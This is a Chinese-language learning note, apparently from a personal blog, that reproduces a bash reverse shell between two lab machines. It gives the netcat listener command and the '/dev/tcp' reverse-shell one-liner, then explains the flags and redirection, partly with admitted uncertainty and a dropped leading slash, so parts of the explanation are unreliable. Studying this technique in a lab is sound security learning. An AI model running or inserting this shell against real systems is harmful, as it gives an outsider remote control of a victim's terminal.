part1:不求甚解的本地复现
攻击端Debian 10.x: 192.168.208.134
受害端Ubuntu : 192.168.208.135
攻击端打开(监听)某端口:
键入命令:【nc -lvp 8080】
受害端执行反弹shell:
键入命令:【bash -i >& /dev/tcp/192.168.208.134/8080 0>&1】
效果:
可以在攻击机上操作受害机的终端。
part2:尝试理解原理
(1) nc -lvp 8080
-l 设置netcat处于监听状态等待连接。
-v 显示错误提示信息(非必须)
-p 设置本地监听的端口号
(2) bash -i >& dev/tcp/192.168.208.134/8080 0>&1
-i 创建一个交互式的shell.
0,stdin,标准输入(一般是键盘)
1,stdout,标准输出(一般是显示屏,准确的说是用户终端控制台)
2,stderr,标准错误(出错信息输出)
> 输出重定向;指定具体的输出目标以替换默认的标准输出。
eg:
>&:将联合符号前面的内容与后面相结合然后一起重定向给后者。
dev/tcp/192.168.208.134/8080(dev/tcp/ip/port):linux里一切皆文件;这个东西也看做文件(但不能访问),其作用是让本机与目标主机通过指定端口建立tcp连接。
整体解读的话,就是:
bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,并重定向给tcp 8080会话连接;(这个具体咋回事估计得等再学点东西才能理解)
用户键盘输入与用户标准输出相结合,并重定向给一个标准的输出;(这就是效果图中ls出现两次的原因;第二次是因为标准输入也被重定向给了标准输出,输出出来了)
即得到一个bash 反弹环境。